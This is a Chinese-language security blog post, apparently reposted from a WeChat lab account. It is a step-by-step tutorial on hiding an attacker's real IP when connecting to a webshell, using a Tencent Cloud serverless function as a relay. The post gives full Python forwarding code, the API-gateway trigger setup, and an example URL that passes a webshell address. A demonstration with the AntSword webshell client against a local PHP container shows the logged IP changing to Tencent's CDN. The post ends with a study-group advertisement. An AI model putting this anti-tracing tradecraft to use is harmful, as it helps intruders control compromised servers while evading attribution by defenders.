【防溯源】利用腾讯云来隐藏连接Webshell的真实IP
2021-08-10 08:50:00 Author: mp.weixin.qq.com(查看原文) 阅读量:53 收藏

文章来源|MS08067安全实验室

本文作者:大方子(MS08067实验室核心成员)

因为腾讯云函数自带CDN,这样我们可以通过腾讯云函数来转发我们的Webshell请求,从而达到隐藏真实IP的目的
首先来到腾讯云后台找到云函数,我们使用自定义的模版:


将下面代码复制到index.py中
# -*- coding: utf8 -*-import requestsimport jsondef geturl(urlstr):  jurlstr = json.dumps(urlstr)  dict_url = json.loads(jurlstr)  return dict_url['u']def main_handler(event, context):  url = geturl(event['queryString'])  postdata = event['body']  headers=event['headers']  resp=requests.post(url,data=postdata,headers=headers,verify=False)  response={    "isBase64Encoded": False,    "statusCode": 200,    "headers": {'Content-Type': 'text/html;charset='+resp.apparent_encoding},    "body": resp.text  }  return response


部署成功后,点击触发管理->创建触发器

这里需要选择API网关触发


创建成功后,我们就可以看到我们的访问路径


然后在我们的访问路径后面增加?u=webshell一句话木马的地址即可,例如
https://sxxxxxxxxxxxxxxxxx.gz.apigw.tencentcs.com/release/helloworld-1627229247?u=http://xxxx/webshell.php

这里我用docker-compose来临时搭建了一个PHP服务,利用docker-coompose快速搭建PHP:
https://github.com/nanoninja/docker-nginx-php-mysql


然后在对应的文件夹下写一个webshell


然后我们在开启一个终端来实时查看PHP容器的日志信息


这里我通过蚁剑直接连接,可以看到logs显示出了我的真实IP地址


然后我们在尝试通过腾讯云的云函数来访问我们的webshell。打开蚁剑url设置为刚刚复制的云函数访问路径?u=木马路径。
https://serxxxxxxxxxxxx.gz.apigw.tencentcs.com/release/forwarded?u=http://vps-ip/index.php


然后测试连接成功


然后我们再次访问webshell,可以看到IP已经变为腾讯云CDN的IP

补充:

这里最好在【函数管理】 -> 【函数配置】里面,最好把执行超时时间设置成和蚁剑里面的超时时间一样或者更长

扫描下方二维码加入星球学习

加入后邀请你进入内部微信群,内部微信群永久有效!

 

 

来和5000+位同学一起加入星球学习吧!


文章来源: http://mp.weixin.qq.com/s?__biz=MzU1NjgzOTAyMg==&mid=2247494920&idx=1&sn=b472e4c6fff20cad8dde6d7ce5b2ab11&chksm=fc3c5409cb4bdd1fe2f7f2711ea2effe8f42237c802c708d84d771daecb1e552894b6b3795db#rd
如有侵权请联系:admin#unsafe.sh